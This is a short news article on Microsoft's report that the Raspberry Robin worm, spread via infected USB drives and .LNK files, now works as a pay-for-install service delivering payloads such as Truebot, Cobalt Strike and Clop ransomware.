Microsoft has warned that the Raspberry Robin malware is being used to distribute various disruptive programs, including ransomware, to affected endpoints.
The malware, which was first identified in late 2021 and whose endpoint was unknown at the time, appears to have evolved into an infection service offered to anyone with the means to pay.
In a particular blog post, Microsoft cybersecurity researchers define Raspberry Robin as “part of a complex and interconnected malware ecosystem,” with connections to other malware families and attack techniques.
Infection For Hire
Whoever is responsible for Raspberry Robin has been busy over the past few weeks. Data from Microsoft Defender for Endpoint indicates that in the past 30 days, at least 3,000 devices across 1,000 companies have received alerts relating to the Raspberry Robin payload.
The business went on to say that there are different payloads for malware, including IceID, Bumblebee, Truebot, and the FakeUpdates virus that EvilCorp may have used. It’s all in July 2022.
Microsoft, however, also discovered FIN11 using Raspberry Robin in October 2022. (AKA TA505—the group behind the Dridex banking trojan and Locky ransomware). The company claimed that this behavior resulted in hands-on-keyboard compromises using Cobalt Strike and that sometimes a Truebot infection was present between the Raspberry Robin and Cobalt Strike phases. The organization launched the Clop ransomware after activating the Cobalt Strike beacon.
Microsoft concluded that the Raspberry Robin gang accepts payments for distributing various infections and ransomware to its victims’ endpoints.
The report concludes that it’s possible that the people behind these Raspberry Robin-related malware campaigns—which are usually spread through other methods like malicious ads or email—are paying the Raspberry Robin operators for malware installations. Again, this is because the cybercriminal economy is very interconnected.
Red Canary researchers first detected Raspberry Robin after seeing a “cluster of malicious activity.” Most of the time, infected USB drives are used to spread malware offline. However, the researchers found that the worm spreads to new devices through a malicious .LNK file after examining an infected flash drive.